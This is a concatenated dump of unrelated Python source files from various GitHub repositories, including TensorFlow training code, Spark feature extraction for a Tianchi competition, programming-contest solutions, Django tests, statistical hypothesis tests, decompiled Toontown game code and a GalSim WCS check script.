[optimizer, loss, learning_rate, train_prediction],
feed_dict=feed_dict)
if step % EVAL_FREQUENCY == 0:
elapsed_time = time.time() - start_time
start_time = time.time()
print('Step %d (epoch %.2f), %.1f ms' %
(step, float(step) * BATCH_SIZE / train_size,
1000 * elapsed_time / EVAL_FREQUENCY))
print('Minibatch loss: %.3f, learning rate: %.6f' % (l, lr))
print('Minibatch error: %.1f%%' % error_rate(predictions, batch_labels))
print('Validation error: %.1f%%' % error_rate(
eval_in_batches(validation_data, sess), validation_labels))
sys.stdout.flush()
# Finally print the result!
test_error = error_rate(eval_in_batches(test_data, sess), test_labels)
print('Test error: %.1f%%' % test_error)
if FLAGS.self_test:
print('test_error', test_error)
assert test_error == 0.0, 'expected 0.0 test_error, got %.2f' % (
test_error,)
if __name__ == '__main__':
tf.app.run()
# ==============================================================================
# File: /5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/226/users/4163/codes/1638_652.py
# (repo: JosephLevinthal/Research-projects)
# ==============================================================================
a = int(input("Enter a 3-digit number: "))
b = a // 100   # hundreds digit (computed but never used afterwards)
c = a % 100    # last two digits
x = a % c      # note: this raises ZeroDivisionError when the last two digits are 00
if x == 0:
    print("SIM")   # "SIM" = yes: a is divisible by its last two digits
else:
    print("NAO")   # "NAO" = no
# ==============================================================================
# File: /onspark_generate_feature_user.py (repo: 00fq00/competition_tianchi)
# ==============================================================================
# -*- coding: utf-8 -*-
import sys
from operator import add
from pyspark import SparkConf
from pyspark import SparkContext
from sklearn.svm import SVC
from sklearn.svm import LinearSVC
from sklearn.pipeline import Pipeline
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
####################################################################################
############################      User features      ############################
####################################################################################
def extract1(line):
import time
(uid, iid, ict) = line.strip().split("\t")[0].split(" ")
items = filter(lambda x:x[0]>0, [(int(time.mktime(time.strptime('2014-'+etime,'%Y-%m-%d-%H'))-time.mktime(time.strptime('2014-'+i.split(",")[0],'%Y-%m-%d-%H')))/(24*3600)+1, int(i.split(",")[1])) for i in line.strip().split("\t")[1].split(" ")])
return (uid,items)
def extract2(items_list):
import itertools
items, items_buy, items_buy_3, f, inf = [], [], [], [0]*39, 100
    f[32] = len(items_list) # number of distinct items interacted with
for i in items_list:
if len(filter(lambda x:x[1]==4,i))>0:
items_buy.append(i)
if len(filter(lambda x:x[1]==4 and x[0]<=3,i))>0:
items_buy_3.append(i)
items.extend(i)
    f[33] = len(items_buy) # number of items purchased
    f[34] = len(items_buy_3) # items purchased within the last 3 days
    f[35] = len(filter(lambda x:len(x)==1,items_list)) # items with exactly one interaction
    f[36] = len(filter(lambda x:len(x)==2,items_list)) # items with exactly two interactions
    f[37] = len(filter(lambda x:len(x)==3,items_list)) # items with exactly three interactions
items = sorted(items, key=lambda x:x[0], reverse=True)
buy = filter(lambda x:x[1]==4, items)
last = buy[-1][0] if len(buy)!=0 else inf
    f[24] = len(filter(lambda x:x[0]<=1 and x[1]==1, items)) # clicks in the last day
    f[25] = len(filter(lambda x:x[0]<=1 and x[1]==2, items)) # favorites in the last day
    f[26] = len(filter(lambda x:x[0]<=1 and x[1]==3, items)) # cart-adds in the last day
    f[27] = len(filter(lambda x:x[0]<=1 and x[1]==4, items)) # purchases in the last day
    f[28] = len(filter(lambda x:x[0]<=3 and x[1]==1, items)) # clicks in the last 3 days
    f[29] = len(filter(lambda x:x[0]<=3 and x[1]==2, items)) # favorites in the last 3 days
    f[30] = len(filter(lambda x:x[0]<=3 and x[1]==3, items)) # cart-adds in the last 3 days
    f[31] = len(filter(lambda x:x[0]<=3 and x[1]==4, items)) # purchases in the last 3 days
    f[0] = len(filter(lambda x:x[0]<=7 and x[1]==1, items)) # clicks in the last week
    f[1] = len(filter(lambda x:x[0]<=7 and x[1]==2, items)) # favorites in the last week
    f[2] = len(filter(lambda x:x[0]<=7 and x[1]==3, items)) # cart-adds in the last week
    f[3] = len(filter(lambda x:x[0]<=7 and x[1]==4, items)) # purchases in the last week
    f[4] = len(filter(lambda x:x[0]<=21 and x[1]==1, items)) # clicks in the last 3 weeks
    f[5] = len(filter(lambda x:x[0]<=21 and x[1]==2, items)) # favorites in the last 3 weeks
    f[6] = len(filter(lambda x:x[0]<=21 and x[1]==3, items)) # cart-adds in the last 3 weeks
    f[7] = len(filter(lambda x:x[0]<=21 and x[1]==4, items)) # purchases in the last 3 weeks
    f[8] = min(1.0,round(1.0*f[3]/f[0],4)) if f[0]!=0 else 0.0 # click-to-purchase rate, last week
    f[9] = min(1.0,round(1.0*f[3]/f[1],4)) if f[1]!=0 else 0.0 # favorite-to-purchase rate, last week
    f[10] = min(1.0,round(1.0*f[3]/f[2],4)) if f[2]!=0 else 0.0 # cart-to-purchase rate, last week
    f[11] = min(1.0,round(1.0*f[7]/f[4],4)) if f[4]!=0 else 0.0 # click-to-purchase rate, last 3 weeks
    f[12] = min(1.0,round(1.0*f[7]/f[5],4)) if f[5]!=0 else 0.0 # favorite-to-purchase rate, last 3 weeks
    f[13] = min(1.0,round(1.0*f[7]/f[6],4)) if f[6]!=0 else 0.0 # cart-to-purchase rate, last 3 weeks
    f[14] = last # days since the last purchase
    f[15] = len(set([item[0] for item in items if item[0]<=3])) # distinct interaction days in the last 3 days
    f[16] = len(set([item[0] for item in items if item[0]<=7])) # distinct interaction days in the last week
    f[17] = len(set([item[0] for item in items if item[0]<=21])) # distinct interaction days in the last 3 weeks
    f[18] = items[-1][0] if len(items)!=0 else inf # days since the last interaction
    inter = [len(list(i)) for _,i in itertools.groupby(items, lambda x: x[0])]
    f[19] = len(inter) # number of days with interactions
    f[20] = max(inter) if len(inter)!=0 else 0 # interactions on the most active day
    f[21] = len(filter(lambda x:x[0]<=1 and x[1]==4, items)) # purchases in the last day (duplicates f[27])
    f[22] = len(filter(lambda x:x[0]<=3 and x[1]==4, items)) # purchases in the last 3 days (duplicates f[31])
    f[23] = len(filter(lambda x:x[0]<=7 and x[1]==4, items)) # purchases in the last 7 days (duplicates f[3])
    f[38] = round(1.0*len(items)/f[32],4) if f[32]!=0 else 0.0 # average interactions per item
return "\t".join([str(i) for i in f])
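# ------------------------------------------------------------------------------
# Record-format sketch (inferred from the parsing in extract1, not documented
# in the original repo): each input line looks like
#   "<uid> <iid> <category>\t<mm-dd-hh>,<behavior> <mm-dd-hh>,<behavior> ..."
# with Tianchi behavior codes 1=click, 2=favorite, 3=add-to-cart, 4=purchase.
# extract1 maps every event to a (days_before_etime, behavior) pair, e.g. with
# etime = "12-18-23":
#   "u1 i1 c1\t12-18-10,1 12-16-09,4"  ->  ("u1", [(1, 1), (3, 4)])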
global etime
global subset
if __name__ == "__main__":
import fileinput
conf = (SparkConf()
.setMaster("spark://namenode.omnilab.sjtu.edu.cn:7077")
.setAppName("Extract")
.set("spark.cores.max", "32")
.set("spark.driver.memory", "4g")
.set("spark.executor.memory", "6g"))
sc = SparkContext(conf = conf)
lines = sc.textFile('hdfs://namenode.omnilab.sjtu.edu.cn/user/qiangsiwei/competition_tianchi/uid_iid', 1)
target, etime, subset = "12-19-0", "12-18-23", {}
# target, etime, subset = "12-18-0", "12-17-23", {}
# target, etime, subset = "12-17-0", "12-16-23", {}
# target, etime, subset = "12-16-0", "12-15-23", {}
# target, etime, subset = "12-15-0", "12-14-23", {}
# target, etime, subset = "12-14-0", "12-13-23", {}
# target, etime, subset = "12-13-0", "12-12-23", {}
# target, etime, subset = "12-12-0", "12-11-23", {}
# target, etime, subset = "12-11-0", "12-10-23", {}
# target, etime, subset = "12-10-0", "12-09-23", {}
# target, etime, subset = "12-09-0", "12-08-23", {}
# target, etime, subset = "12-08-0", "12-07-23", {}
# target, etime, subset = "12-07-0", "12-06-23", {}
# target, etime, subset = "12-06-0", "12-05-23", {}
# target, etime, subset = "12-05-0", "12-04-23", {}
# target, etime, subset = "12-04-0", "12-03-23", {}
# target, etime, subset = "12-03-0", "12-04-23", {}
# target, etime, subset = "12-02-0", "12-01-23", {}
# target, etime, subset = "12-01-0", "11-30-23", {}
for line in fileinput.input("./tianchi_mobile_recommend_train_item.csv"):
subset[line.split(",")[0]] = True
counts = lines.map(lambda x : extract1(x))\
.groupByKey()\
.map(lambda x : x[0]+"\t"+extract2(x[1]))
output = counts.saveAsTextFile("./competition_tianchi/feature/"+target+"/user/")
# ==============================================================================
# File: /Problem Solving/Strings/Funny String.py (repo: xtanmaygarg/HackerRankSolutions)
# ==============================================================================
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the funnyString function below.
def funnyString(s):
t = s[::-1]
s = list(s)
t = list(t)
sl = []
tl = []
fl = []
gl = []
for i in s:
sl.append(ord(i))
for i in t:
tl.append(ord(i))
for i in range(0,len(sl)-1):
fl.append(abs(sl[i+1] - sl[i]))
for i in range(0,len(tl)-1):
gl.append(abs(tl[i+1] - tl[i]))
    # print(gl)  # debug
    # print(fl)  # debug: stray stdout here would fail the HackerRank checker
if fl == gl:
return "Funny"
else:
return "Not Funny"
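# Worked example: for s = "acxz" the ord-gaps are [2, 21, 2] and the reversed
# string "zxca" also gives [2, 21, 2], so the result is "Funny"; for s = "bcxz"
# the lists are [1, 21, 2] vs. [2, 21, 1], so "Not Funny".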
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
q = int(input())
for q_itr in range(q):
s = input()
result = funnyString(s)
fptr.write(result + '\n')
fptr.close()
# ==============================================================================
# File: /hello_exercise/manage.py (repo: Alchemy2011/django_rest_framework20171030)
# ==============================================================================
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "hello_exercise.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
# ==============================================================================
# File: /output/instances/nistData/atomic/double/Schema+Instance/NISTXML-SV-IV-atomic-double-enumeration-2-3.py
# (repo: tefra/xsdata-w3c-tests, MIT)
# ==============================================================================
from output.models.nist_data.atomic.double.schema_instance.nistschema_sv_iv_atomic_double_enumeration_2_xsd.nistschema_sv_iv_atomic_double_enumeration_2 import NistschemaSvIvAtomicDoubleEnumeration2
from output.models.nist_data.atomic.double.schema_instance.nistschema_sv_iv_atomic_double_enumeration_2_xsd.nistschema_sv_iv_atomic_double_enumeration_2 import NistschemaSvIvAtomicDoubleEnumeration2Type
obj = NistschemaSvIvAtomicDoubleEnumeration2(
value=NistschemaSvIvAtomicDoubleEnumeration2Type.VALUE_2_7311892445441031_E36
)
# ==============================================================================
# File: /budget/tests/test_views.py (repo: davidlares/budget-webapp-django-testing, MIT)
# ==============================================================================
from django.test import TestCase, Client
from django.urls import reverse
from budget.models import Project, Category, Expense
import json
class TestViews(TestCase):
# runs before any test here
def setUp(self):
self.client = Client() # creating a client
self.list_url = reverse('list')
self.detail_url = reverse('detail', args=['desktop-app'])
# creating a object for getting the slug correctly (override save method)
self.desktopapp = Project.objects.create(
name = "Desktop app",
budget = 10000
)
# GET methods
def test_project_list_get(self):
        response = self.client.get(self.list_url)  # GET the project list page
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'budget/project-list.html')
def test_project_detail_get(self):
        response = self.client.get(self.detail_url)  # GET the project detail page
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'budget/project-detail.html')
# POST methods
def test_project_detail_POST_new_expense(self):
Category.objects.create (
project = self.desktopapp,
name = 'development'
)
response = self.client.post(self.detail_url, {
'title': 'expense1',
'amount': 1000,
'category': 'development'
})
        # 302: the view redirects after a successful POST
self.assertEquals(response.status_code, 302)
# getting the project
self.assertEquals(self.desktopapp.expenses.first().title, 'expense1')
    # POST with no data
def test_project_detail_post_no_data(self):
response = self.client.post(self.detail_url)
        # still redirects (302) even when no payload is supplied
self.assertEquals(response.status_code, 302)
# getting the project
self.assertEquals(self.desktopapp.expenses.count(), 0)
# DELETE methods
def test_project_detail_delete_expense(self):
category1 = Category.objects.create (
project = self.desktopapp,
name = 'development'
)
Expense.objects.create(
project = self.desktopapp,
title = 'expense1',
amount = 1000,
category = category1
)
response = self.client.delete(self.detail_url, json.dumps({
            'id': 1  # the id of the expense created above
}))
        # intentionally broken: the delete view redirects, so this should be 302
self.assertEquals(response.status_code, 204)
self.assertEquals(self.desktopapp.expenses.count(), 0)
# ==============================================================================
# File: /meanmax/stats/test.py (repo: castorini/meanmax, MIT)
# ==============================================================================
from dataclasses import dataclass, field
from typing import Any, Dict
from scipy import stats
import numpy as np
from .estimator import QuantileEstimator
from .utils import compute_pr_x_ge_y
from .tables import MANN_WHITNEY_UP010
@dataclass(frozen=True)
class TwoSampleHypothesisTest(object):
options: Dict[str, Any] = field(default_factory=dict)
@property
def name(self):
raise NotImplementedError
def __hash__(self):
return hash(self.name)
def __eq__(self, other):
return self.name == other.name
def test(self, sample1: np.ndarray, sample2: np.ndarray, alpha=0.05):
raise NotImplementedError
@dataclass(frozen=True)
class StudentsTTest(TwoSampleHypothesisTest):
@property
def name(self):
        # scipy's ttest_ind defaults to equal_var=True, so an absent option
        # means Student's t-test; only an explicit equal_var=False is Welch's
        if self.options.get('equal_var', True):
            return 't-test'
        else:
            return 'Welch\'s t-test'
def test(self, sample1: np.ndarray, sample2: np.ndarray, alpha=0.05):
t, p = stats.ttest_ind(sample1, sample2, **self.options)
return p / 2 < alpha and t < 0, t, p
@dataclass(frozen=True)
class SDBootstrapTest(TwoSampleHypothesisTest):
@property
def name(self):
return 'Stochastic Dominance Bootstrap'
def test(self, sample1: np.ndarray, sample2: np.ndarray, alpha=0.05):
iters = self.options.get('iters', 1000)
gt = compute_pr_x_ge_y(sample1, sample2)
sample = np.concatenate((sample1, sample2))
n = len(sample1)
        # use a distinct name so the scipy.stats import is not shadowed
        boot_stats = []
        for _ in range(iters):
            np.random.shuffle(sample)
            sample1 = sample[:n]
            sample2 = sample[n:]
            boot_stats.append(compute_pr_x_ge_y(sample1, sample2))
        p = np.mean(np.array(boot_stats) <= gt)
return p < alpha, p, p
@dataclass(frozen=True)
class MannWhitneyUTest(TwoSampleHypothesisTest):
@property
def name(self):
return 'Mann-Whitney U test'
def __post_init__(self):
if 'alternative' not in self.options:
self.options['alternative'] = 'less'
def exact_test(self, s1, s2):
s1 = [(x, 0) for x in s1]
s2 = [(x, 1) for x in s2]
n = len(s1)
m = len(s2)
s = sorted(s1 + s2)
ranksum1 = 0
ranksum2 = 0
tmp_ranksum = 0
n_ranksum = 0
counts = [0, 0]
last_x = -1000000
for rank, (x, l) in enumerate(s):
if x != last_x and n_ranksum > 0:
ranksum1 += (tmp_ranksum / n_ranksum) * counts[0]
ranksum2 += (tmp_ranksum / n_ranksum) * counts[1]
tmp_ranksum = 0
n_ranksum = 0
counts = [0, 0]
counts[l] += 1
tmp_ranksum += rank + 1
n_ranksum += 1
last_x = x
if n_ranksum > 0:
ranksum1 += (tmp_ranksum / n_ranksum) * counts[0]
ranksum2 += (tmp_ranksum / n_ranksum) * counts[1]
U1 = (n * m) + (n * (n + 1)) / 2 - ranksum1
U2 = (n * m) + (m * (m + 1)) / 2 - ranksum2
U = min(U1, U2)
return U, 0.05 if U <= MANN_WHITNEY_UP010[n - 1][m - 1] and ranksum1 < ranksum2 else 0.051
def test(self, sample1: np.ndarray, sample2: np.ndarray, alpha=0.05):
if len(sample1) <= 20 or len(sample2) <= 20:
U, p = self.exact_test(sample1, sample2)
else:
U, p = stats.mannwhitneyu(sample1, sample2, **self.options)
return p <= alpha, U, p
@dataclass(frozen=True)
class QuantileTest(TwoSampleHypothesisTest):
def __post_init__(self):
if 'quantile' not in self.options:
self.options['quantile'] = 0.5
if 'bootstrap_samples' not in self.options:
self.options['bootstrap_samples'] = 2000
if 'estimate_method' not in self.options:
self.options['estimate_method'] = 'harrelldavis'
if 'alternative' not in self.options:
self.options['alternative'] = 'less'
@property
def name(self):
if self.options['estimate_method'] == 'harrelldavis':
return 'Harrell-Davis quantile test'
if self.options['estimate_method'] == 'direct':
return 'Direct quantile test'
def test(self, sample1: np.ndarray, sample2: np.ndarray, alpha=0.05):
test = QuantileEstimator(dict(estimate_method=self.options['estimate_method'],
quantile=self.options['quantile']))
dstar_arr = []
b = self.options['bootstrap_samples']
for _ in range(b):
sx = test.estimate_point(np.random.choice(sample1, len(sample1)))
sy = test.estimate_point(np.random.choice(sample2, len(sample2)))
dstar_arr.append(sx - sy)
dstar_arr = np.array(dstar_arr)
pstar = (sum(dstar_arr < 0) + 0.5 * sum(dstar_arr == 0)) / b
if self.options['alternative'] == 'less':
p = 1 - pstar
elif self.options['alternative'] == 'both':
p = 2 * min(pstar, 1 - pstar)
else: # greater
p = pstar
return p < alpha, pstar, p
@dataclass(frozen=True)
class ASDTest(TwoSampleHypothesisTest):
@property
def name(self):
return 'Almost Stochastic Dominance test'
def test(self, sample1: np.ndarray, sample2: np.ndarray, alpha=0.05):
tmp = sample2
sample2 = sample1
sample1 = tmp
phi = stats.norm.ppf(alpha)
epsilons = []
n = len(sample1)
m = len(sample2)
c = np.sqrt(n * m / (n + m))
eps_fn = lambda x, y: 1 - compute_pr_x_ge_y(x, y)
eps_orig = eps_fn(sample1, sample2)
for _ in range(1000):
bs1 = np.random.choice(sample1, n)
bs2 = np.random.choice(sample2, m)
epsilons.append(c * (eps_fn(bs1, bs2) - eps_orig))
min_eps = eps_orig - (1 / c) * np.std(epsilons) * phi
return min_eps < self.options.get('threshold', 0.5), min_eps, alpha
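# --- illustrative usage sketch (added; the samples and seed below are made up) ---
if __name__ == '__main__':
    rng = np.random.RandomState(0)
    a = rng.normal(0.0, 1.0, 30)
    b = rng.normal(0.5, 1.0, 30)
    # Welch's t-test (explicit equal_var=False)
    rejected, t, p = StudentsTTest(dict(equal_var=False)).test(a, b)
    print("Welch's t-test:", rejected, t, p)
    # samples are larger than 20, so this takes the scipy code path
    rejected, U, p = MannWhitneyUTest().test(a, b)
    print('Mann-Whitney U test:', rejected, U, p)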
| [
"[email protected]"
] | |
2a1f653f3c6aa17decf8fe6281e94268b31d7d45 | 588f4991cad99f517ca5028e0e41c5b4d5252543 | /contest/abc146/A.py | 6dd0b6d5935a91706c75eddb86e2fa19ed8bb293 | [
"MIT"
] | permissive | mola1129/atcoder | 3002ff38cabf0ccb5142bd576ed90419fccde02e | 1d3b18cb92d0ba18c41172f49bfcd0dd8d29f9db | refs/heads/master | 2020-06-16T12:24:49.609707 | 2020-03-14T15:58:42 | 2020-03-14T15:58:42 | 195,571,664 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 144 | py | s = input()
week = ['SUN', 'MON', 'TUE', 'WED', 'THU', 'FRI', 'SAT']
for i in range(7):
if s == week[i]:
print(7 - i)
break
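# A compact alternative sketch (added, equivalent): list.index avoids the loop,
# assuming the input is always one of the seven abbreviations.
# print(7 - week.index(s))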
| [
"[email protected]"
] | |
e87eb74666e87fd06b949a6ae8bb772a467b3364 | ba0cbdae81c171bd4be7b12c0594de72bd6d625a | /MyToontown/py2/toontown/cogdominium/CogdoFlyingLevelQuadrant.pyc.py | cc4db2f44140d0abe915edf689c163e5055699a6 | [] | no_license | sweep41/Toontown-2016 | 65985f198fa32a832e762fa9c59e59606d6a40a3 | 7732fb2c27001264e6dd652c057b3dc41f9c8a7d | refs/heads/master | 2021-01-23T16:04:45.264205 | 2017-06-04T02:47:34 | 2017-06-04T02:47:34 | 93,279,679 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,537 | py | # 2013.08.22 22:17:38 Pacific Daylight Time
# Embedded file name: toontown.cogdominium.CogdoFlyingLevelQuadrant
import math
from direct.directutil import Mopath
from pandac.PandaModules import NodePath, Point3, Vec4
from CogdoFlyingObjects import CogdoFlyingPlatform
import CogdoFlyingGameGlobals as Globals
class CogdoFlyingLevelQuadrant():
__module__ = __name__
notify = directNotify.newCategory('CogdoFlyingLevelQuadrant')
def __init__(self, serialNum, model, level, parent):
self.serialNum = serialNum
self._model = model
self._level = level
self._root = NodePath('Quadrant' + `serialNum`)
self._model.reparentTo(self._root)
self._root.reparentTo(parent)
self._visible = True
self.platforms = {}
self.gatherables = []
self.obstacles = []
self._playing = False
self._obstaclesRoot = NodePath('obstacles')
self._obstaclesRoot.reparentTo(self._root)
self._initObstacles(self._obstaclesRoot)
self._gatherablesRoot = NodePath('gatherables')
self._gatherablesRoot.reparentTo(self._root)
self._initGatherables(self._gatherablesRoot)
self._platformsRoot = NodePath('platforms')
self._platformsRoot.reparentTo(self._model)
self._initPlatforms(self._platformsRoot)
self._optimize()
self.place()
def _optimize(self):
lightCones = NodePath('lightCones')
for np in self._platformsRoot.findAllMatches('**/*lightCone*'):
np.wrtReparentTo(lightCones)
lightCones.reparentTo(self._model)
node = self._model.find('**/ducts')
if not node.isEmpty():
node.flattenStrong()
for np in node.getChildren():
np.wrtReparentTo(self._model)
node = self._model.find('**/nests')
if not node.isEmpty():
for np in node.getChildren():
np.flattenStrong()
np.wrtReparentTo(self._model)
for np in self._model.findAllMatches('**/*LayerStack*'):
np.wrtReparentTo(self._model)
for np in self._model.find('**/static').getChildren():
np.wrtReparentTo(self._model)
self._model.flattenMedium()
def _initPlatforms(self, parent):
platformModels = self._model.findAllMatches('**/%s' % Globals.Level.PlatformName)
for platformModel in platformModels:
platform = CogdoFlyingPlatform(platformModel, parent=parent)
self.platforms[platform.getName()] = platform
def _destroyPlatforms(self):
for platform in self.platforms.values():
platform.destroy()
del self.platforms
def _initGatherables(self, parent):
self.generateGatherables(self._model, parent=parent)
if Globals.Level.SpawnLaffPowerupsInNests:
self.generateNestPowerups(self._model, parent=parent)
def generateNestPowerups(self, gatherableModel, parent):
nests = gatherableModel.findAllMatches('**/%s;+s' % Globals.Level.LegalEagleNestName)
for nest in nests:
offset = Globals.Level.LaffPowerupNestOffset
pickup = self._level.gatherableFactory.createPowerup(Globals.Level.GatherableTypes.LaffPowerup)
pickup.reparentTo(parent)
pickup.setPos(parent, nest.getPos(parent) + offset)
if Globals.Level.AddSparkleToPowerups:
sparkles = self._level.gatherableFactory.createSparkles(Vec4(1, 1, 1, 1), Vec4(1, 1, 0, 1), 10.0)
sparkles.reparentTo(pickup)
sparkles.setPos(0, 0, 1)
sparkles.start()
self.gatherables.append(pickup)
def generateGatherables(self, gatherableModel, parent = None, spread = Globals.Level.GatherablesDefaultSpread):
parent = parent or self._root
mopath = Mopath.Mopath(name='gatherables')
def generateMemos():
gatherPaths = gatherableModel.findAllMatches('**/%s' % Globals.Level.GatherablesPathName)
for gatherPath in gatherPaths:
mopath.loadNodePath(gatherPath)
t = 0.0
while t < mopath.getMaxT():
pickup = self._level.gatherableFactory.createMemo()
pickup.reparentTo(parent)
mopath.goTo(pickup, t)
self.gatherables.append(pickup)
t += spread
gatherPath.removeNode()
angleSpread = 360.0 / Globals.Level.NumMemosInRing
gatherPaths = gatherableModel.findAllMatches('**/%s' % Globals.Level.GatherablesRingName)
for gatherPath in gatherPaths:
mopath.loadNodePath(gatherPath)
t = 0.0
while t < mopath.getMaxT():
angle = 0
r = 3
while angle < 360.0:
pickup = self._level.gatherableFactory.createMemo()
pickup.reparentTo(parent)
mopath.goTo(pickup, t)
pickup.setX(parent, pickup.getX() + r * math.cos(math.radians(angle)))
pickup.setZ(parent, pickup.getZ() + r * math.sin(math.radians(angle)))
self.gatherables.append(pickup)
angle += angleSpread
t += spread + 0.5
gatherPath.removeNode()
def generatePropellers():
gatherables = gatherableModel.findAllMatches('**/%s' % Globals.Level.PropellerName)
for gatherable in gatherables:
pickup = self._level.gatherableFactory.createPropeller()
pickup.reparentTo(gatherable.getParent())
pickup.setPos(parent, gatherable.getPos(parent))
self.gatherables.append(pickup)
gatherable.removeNode()
def generatePowerUps():
for powerupType, locName in Globals.Level.PowerupType2Loc.iteritems():
if powerupType == Globals.Level.GatherableTypes.LaffPowerup and Globals.Level.IgnoreLaffPowerups:
continue
gatherables = gatherableModel.findAllMatches('**/%s' % locName)
for gatherable in gatherables:
pickup = self._level.gatherableFactory.createPowerup(powerupType)
pickup.reparentTo(parent)
pickup.setPos(parent, gatherable.getPos(parent))
if Globals.Level.AddSparkleToPowerups:
sparkles = self._level.gatherableFactory.createSparkles(Vec4(1, 1, 1, 1), Vec4(1, 1, 0, 1), 10.0)
sparkles.reparentTo(pickup)
sparkles.setPos(0, 0, 1)
sparkles.start()
self.gatherables.append(pickup)
gatherable.removeNode()
generateMemos()
generatePropellers()
generatePowerUps()
def _initObstacles(self, parent):
def initWhirlwinds():
obstacles = self._root.findAllMatches('**/%s' % Globals.Level.WhirlwindName)
for obstacleLoc in obstacles:
motionPath = self._model.find('**/%s%s' % (obstacleLoc.getName(), Globals.Level.WhirlwindPathName))
if motionPath.isEmpty():
motionPath = None
obstacle = self._level.obstacleFactory.createWhirlwind(motionPath=motionPath)
obstacle.model.reparentTo(parent)
obstacle.model.setPos(parent, obstacleLoc.getPos(parent))
self.obstacles.append(obstacle)
obstacleLoc.removeNode()
return
def initStreamers():
obstacles = self._model.findAllMatches('**/%s' % Globals.Level.StreamerName)
for obstacleLoc in obstacles:
obstacle = self._level.obstacleFactory.createFan()
obstacle.model.reparentTo(parent)
obstacle.model.setPos(parent, obstacleLoc.getPos(parent))
obstacle.model.setHpr(parent, obstacleLoc.getHpr(parent))
obstacle.model.setScale(parent, obstacleLoc.getScale(parent))
obstacle.setBlowDirection()
if Globals.Level.AddParticlesToStreamers:
particles = self._level.obstacleFactory.createStreamerParticles(Vec4(1, 1, 1, 1), Vec4(1, 1, 1, 1), 10.0)
particles.reparentTo(obstacle.model)
particles.start()
self.obstacles.append(obstacle)
obstacleLoc.removeNode()
def initWalkingMinions():
motionPaths = self._model.findAllMatches('**/%s' % Globals.Level.MinionWalkingPathName)
for motionPath in motionPaths:
obstacle = self._level.obstacleFactory.createWalkingMinion(motionPath=motionPath)
obstacle.model.reparentTo(parent)
obstacle.model.setPos(parent, motionPath.getPos(parent))
self.obstacles.append(obstacle)
def initFlyingMinions():
motionPaths = self._model.findAllMatches('**/%s' % Globals.Level.MinionFlyingPathName)
for motionPath in motionPaths:
obstacle = self._level.obstacleFactory.createFlyingMinion(motionPath=motionPath)
obstacle.model.reparentTo(parent)
obstacle.model.setPos(parent, motionPath.getPos(parent))
self.obstacles.append(obstacle)
initWhirlwinds()
initStreamers()
initWalkingMinions()
initFlyingMinions()
def place(self):
self._root.setPos(0, self._level.convertQuadNumToY(self.serialNum), 0)
def destroy(self):
if self._visible:
self.offstage()
self._destroyPlatforms()
for obstacle in self.obstacles:
obstacle.destroy()
for gatherable in self.gatherables:
gatherable.destroy()
self._root.removeNode()
del self._root
del self._gatherablesRoot
del self._obstaclesRoot
del self._platformsRoot
del self._level
def onstage(self, elapsedTime = 0.0):
if self._visible:
return
self._root.unstash()
for obstacle in self.obstacles:
obstacle.startMoving(elapsedTime)
for gatherable in self.gatherables:
gatherable.show()
self._visible = True
def offstage(self):
if not self._visible:
return
self._root.stash()
for obstacle in self.obstacles:
obstacle.stopMoving()
for gatherable in self.gatherables:
gatherable.hide()
self._visible = False
def update(self, dt):
if self._visible:
for gatherable in self.gatherables:
gatherable.update(dt)
for obstacle in self.obstacles:
obstacle.update(dt)
def getModel(self):
return self._root
# okay decompyling C:\Users\Maverick\Documents\Visual Studio 2010\Projects\Unfreezer\py2\toontown\cogdominium\CogdoFlyingLevelQuadrant.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2013.08.22 22:17:38 Pacific Daylight Time
| [
"[email protected]"
] | |
c66f88b67107e67c470860ea50ec688511ea496a | 0010b3d8b8f806d6065e1bb1aa3c18f9714001a7 | /tests/fits_files/check_pyast_sip.py | 6bc939935357f3d53094597d1955dba3e9bf7d27 | [
"BSD-3-Clause",
"BSD-2-Clause",
"LicenseRef-scancode-public-domain"
] | permissive | GalSim-developers/GalSim | bfd2d5e57f20874ad81bc735195c5c62efad63eb | f1c0319600cc713373f1cea7459171fbf388848e | refs/heads/main | 2023-08-17T07:30:44.583679 | 2023-08-15T02:52:00 | 2023-08-15T02:52:00 | 3,510,804 | 194 | 104 | NOASSERTION | 2023-09-12T04:03:38 | 2012-02-22T02:51:45 | Python | UTF-8 | Python | false | false | 2,663 | py | # Copyright (c) 2012-2022 by the GalSim developers team on GitHub
# https://github.com/GalSim-developers
#
# This file is part of GalSim: The modular galaxy image simulation toolkit.
# https://github.com/GalSim-developers/GalSim
#
# GalSim is free software: redistribution and use in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions, and the disclaimer given in the accompanying LICENSE
# file.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the disclaimer given in the documentation
# and/or other materials provided with the distribution.
#
# This script is featured on pyast issue page:
# https://github.com/timj/starlink-pyast/issues/8
# PyAst had been failing to write SIP files correctly, but they fixed this in
# v3.9.0. We override their claim of success regardless, since they aren't
# necessarily accurate enough for our purposes (only accurate to 0.1 pixels).
# Thus, older PyAst versions work correctly in GalSim.
import starlink.Atl as Atl
import starlink.Ast as Ast
import astropy.io.fits as pyfits
import numpy
# http://fits.gsfc.nasa.gov/registry/sip/sipsample.fits
hdu = pyfits.open('sipsample.fits')[0]
fc = Ast.FitsChan(Atl.PyFITSAdapter(hdu))
wcs = fc.read()
# A random test position. The "true" RA, Dec values are taken from ds9.
x = 242
y = 75
true_ra = (13 + 30/60. + 1.474154/3600. - 24.) * numpy.pi / 12.
true_dec = (47 + 12/60. + 51.794474/3600.) * numpy.pi / 180.
